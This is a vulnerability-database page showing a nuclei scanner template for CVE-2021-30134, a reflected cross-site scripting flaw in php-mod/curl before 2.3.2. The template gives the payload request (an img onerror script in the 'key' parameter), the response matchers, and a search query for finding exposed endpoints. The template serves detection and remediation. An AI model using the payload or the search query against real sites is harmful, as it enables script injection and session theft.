Lucene search
K

Php-mod/curl Library <2.3.2 - Cross-Site Scripting

๐Ÿ—“๏ธย 06 Jul 2026ย 03:02:03Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 39ย Views

Php-mod/curl Library <2.3.2 - Cross-Site Scripting vulnerability via key parameter in post_file_path_upload.ph

Related
Refs
Code
id: CVE-2021-30134

info:
  name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30134
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-30134
    cwe-id: CWE-79
    epss-score: 0.01261
    epss-percentile: 0.66085
    cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: php_curl_class_project
    product: php_curl_class
    google-query: inurl:"/php-curl-test/post_file_path_upload.php"
  tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'key":"<img src onerror=alert(document.domain)>"'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ed37f77ff28354e58fc121bea4e8eef0dbb00e6759be2755fd5eef69cbc2d8e2022100abc3c5107453da534ca2355e912344e7df3a3caa70f861685f4efc9867d4cb8c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.1
EPSS0.01261
SSVC
39